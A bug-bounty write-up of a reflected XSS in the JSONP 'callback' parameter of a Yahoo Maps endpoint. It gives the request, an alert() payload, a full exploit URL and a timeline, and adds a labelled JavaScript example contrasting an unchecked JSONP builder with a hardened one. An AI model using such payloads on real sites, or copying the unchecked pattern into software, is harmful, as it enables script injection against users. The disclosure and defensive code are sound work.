Self reflected XSS in maps.yahoo.com

This bug was valid for 24 days. Later it turned out to be a duplicate (#@&!).

After typing some text into the search box (e.g. “New York, NY”) and clicking the “Search Maps” button, a GET request is sent to gws2.maps.yahoo.com:

GET /onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=mycjson14 HTTP/1.1

The “callback” parameter is vulnerable to JavaScript injection, for example with the following payload:

alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));

You can see the effect by visiting the following link:

http://gws2.maps.yahoo.com/onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));

This content will then be executed in maps.yahoo.com.

The XSS is exploitable only by visiting maps.yahoo.com and modifying the request to gws2.maps.yahoo.com (or from another website that embeds a request to that vulnerable link).
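The bug above is the classic JSONP mistake: the value of the “callback” parameter is copied into a script response without being checked, so whatever is in it becomes code. As an added example (not code from the original post, and not Yahoo's code), the script below places that unchecked pattern next to a hardened variant that only accepts a dotted JavaScript identifier, sets a proper script content type with nosniff, and prefixes the response with a comment. It parses the same kind of request line the post shows; the function names, the shortened sample request lines and the sample result object are constructed for illustration.

```javascript
// Added example, not code from the original post or from Yahoo. It shows the
// JSONP mistake the post describes (the "callback" value copied into the
// response as-is) next to a hardened variant that only accepts a dotted
// JavaScript identifier. Function names and the sample data are constructed.

// Accepts "mycjson14" or "jQuery.fn.cb_1"; rejects anything containing
// parentheses, quotes, semicolons or whitespace, so a value such as
// "alert(String.fromCharCode(...))" never reaches the response body.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LEN = 64;

function isSafeCallbackName(name) {
  return typeof name === 'string'
    && name.length <= MAX_CALLBACK_LEN
    && CALLBACK_RE.test(name);
}

// Extract the "callback" query parameter from an HTTP request line such as
// "GET /onebox?obq=...&callback=mycjson14 HTTP/1.1". The base URL only exists
// to satisfy the WHATWG URL parser; the host name is irrelevant here.
function callbackFromRequestLine(requestLine) {
  const path = requestLine.split(' ')[1];
  return new URL(path, 'http://example.invalid').searchParams.get('callback');
}

// JSON that is safe to embed inside a script: U+2028/U+2029 are line
// terminators in older JavaScript engines and would break the literal.
function jsonForScript(obj) {
  return JSON.stringify(obj)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The vulnerable pattern: whatever arrives in "callback" becomes code.
function buildJsonpUnchecked(callback, payload) {
  return `${callback}(${JSON.stringify(payload)});`;
}

// Hardened variant. Returns { status, headers, body } so it can be dropped
// into any HTTP framework. Unknown or malformed callbacks get a 400 rather
// than a script; the leading "/**/" (a common JSONP hardening) prevents the
// response from being parsed as a different file format when the first bytes
// are caller-chosen, and nosniff stops browsers from second-guessing the type.
function buildJsonpHardened(callback, payload) {
  const headers = { 'X-Content-Type-Options': 'nosniff' };
  if (callback === null || callback === undefined) {
    headers['Content-Type'] = 'application/json; charset=utf-8';
    return { status: 200, headers, body: jsonForScript(payload) };
  }
  if (!isSafeCallbackName(callback)) {
    headers['Content-Type'] = 'application/json; charset=utf-8';
    return { status: 400, headers, body: JSON.stringify({ error: 'invalid callback' }) };
  }
  headers['Content-Type'] = 'application/javascript; charset=utf-8';
  return { status: 200, headers, body: `/**/${callback}(${jsonForScript(payload)});` };
}

// Constructed samples: a shortened form of the benign request line from the
// post, and one whose callback carries the alert() payload the post describes.
const BENIGN_REQUEST = 'GET /onebox?obq=New%20York%2C%20NY&flags=JX&callback=mycjson14 HTTP/1.1';
const HOSTILE_REQUEST = 'GET /onebox?obq=New%20York%2C%20NY&callback=alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34)); HTTP/1.1';
const SAMPLE_RESULT = { query: 'New York, NY', results: [] };

// Run both request lines through both builders and return the outcomes.
function demo() {
  const out = {};
  for (const [label, line] of [['benign', BENIGN_REQUEST], ['hostile', HOSTILE_REQUEST]]) {
    const cb = callbackFromRequestLine(line);
    out[label] = {
      callback: cb,
      unchecked: buildJsonpUnchecked(cb, SAMPLE_RESULT),
      hardened: buildJsonpHardened(cb, SAMPLE_RESULT),
    };
  }
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

For the benign request the hardened builder returns `/**/mycjson14({...});` with a script content type; for the hostile one the unchecked builder emits a body that begins with `alert(String.fromCharCode(`, while the hardened builder refuses with a 400 and a JSON error. An allow-list of identifier characters is the fix that matters; the nosniff header and the comment prefix are the additional hardening a practitioner would expect on any JSONP endpoint.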

Timeline:

[February 2nd 2014] - bug was reported
[March 5th 2014] - bug was marked as a duplicate

P.S. No screenshots this time, please enjoy the video:

https://www.youtube.com/watch?v=PETcfv68lM0
